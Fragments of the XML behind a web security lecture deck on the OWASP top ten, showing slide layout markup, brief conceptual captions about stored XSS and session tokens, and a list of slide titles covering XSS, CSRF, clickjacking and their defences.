          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28625"/>
              <a:gd name="adj2" fmla="val 830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Session token for lapdonline.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20654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9" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="3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“Stored”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br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server stores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-laced input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Attack delivery method: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upload attack, users who view it are exploited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7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2-07-02 at 3.21.04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283882"/>
            <a:ext cx="5854700" cy="2734236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Screen Shot 2012-07-02 at 3.18.5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150" y="3346824"/>
            <a:ext cx="5943600" cy="34349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16250" y="2758140"/>
            <a:ext cx="533400" cy="2804459"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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25347" y="1653985"/>
            <a:ext cx="2730500" cy="1128060"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -135380"/>
              <a:gd name="adj2" fmla="val 347268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HTML bold for emphasis!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65850" y="3962400"/>
            <a:ext cx="2889997" cy="2133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Every browser that visits the page will run the “bold” command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23010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ap="flat" cmpd="sng">
          <a:miter lim="800000"/>
        </a:ln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3536</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>637</Paragraphs>
  <Slides>65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ＭＳ ゴシック</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Zapf Dingbats</vt:lpstr>
      <vt:lpstr>template</vt:lpstr>
      <vt:lpstr>Web Security and OWASP top-10 </vt:lpstr>
      <vt:lpstr>My weekend</vt:lpstr>
      <vt:lpstr>Stealing Your Own Cookie</vt:lpstr>
      <vt:lpstr>“Reflected” XSS</vt:lpstr>
      <vt:lpstr>Reflected Example</vt:lpstr>
      <vt:lpstr>Stealing Cookies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>“Stored” XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Injection Attacks</vt:lpstr>
      <vt:lpstr>Sanitizing Is Not Easy</vt:lpstr>
      <vt:lpstr>“Frontier Sanitization”</vt:lpstr>
      <vt:lpstr>Second-Order SQL Injection</vt:lpstr>
      <vt:lpstr>Context-Specific Sanitization</vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Recall: Session Cookies</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Another Example: Home Router</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>Secret Token Validation</vt:lpstr>
      <vt:lpstr>Secret Token Validation</vt:lpstr>
      <vt:lpstr>Referrer Validation</vt:lpstr>
      <vt:lpstr>The CRIME Attack</vt:lpstr>
      <vt:lpstr>Web Frameworks</vt:lpstr>
      <vt:lpstr>Web Frameworks</vt:lpstr>
      <vt:lpstr>Web Frameworks – XSS Sanitization</vt:lpstr>
      <vt:lpstr>Web Frameworks</vt:lpstr>
      <vt:lpstr>Remote File Inclusion</vt:lpstr>
      <vt:lpstr>Mass Assignment Vulnerabilities</vt:lpstr>
      <vt:lpstr>Mass Assignment Vulnerabilities</vt:lpstr>
      <vt:lpstr>Malicious Servers and Browser Security</vt:lpstr>
      <vt:lpstr>CSS History Probing</vt:lpstr>
      <vt:lpstr>How does the “Like” button work?</vt:lpstr>
      <vt:lpstr>How does the “Like” button work?</vt:lpstr>
      <vt:lpstr>IFrames</vt:lpstr>
      <vt:lpstr>IFrames</vt:lpstr>
      <vt:lpstr>How does the “Like” button work?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking </vt:lpstr>
      <vt:lpstr>Clickjacking </vt:lpstr>
      <vt:lpstr>Advanced Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking - Mitigation</vt:lpstr>
      <vt:lpstr>Using Frames for Evil</vt:lpstr>
      <vt:lpstr>Framebusting</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Framebusting is Complicated</vt:lpstr>
      <vt:lpstr>Framebusting is Complicated</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Multi-Party Web Applications</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Multi-Party E-Commerce Applications</vt:lpstr>
      <vt:lpstr>Multi-Party E-Commerce Applications</vt:lpstr>
      <vt:lpstr>Multi-Party E-Commerce Applications</vt:lpstr>
      <vt:lpstr>Multi-Party E-Commerce Applications</vt:lpstr>
      <vt:lpstr>Single Sign-On: OAuth</vt:lpstr>
      <vt:lpstr>Single Sign-On: OAuth</vt:lpstr>
      <vt:lpstr>Adversary!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2014-11-17T21:49:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-18T18:28:51Z</dcterms:modified>
</cp:coreProperties>
</file>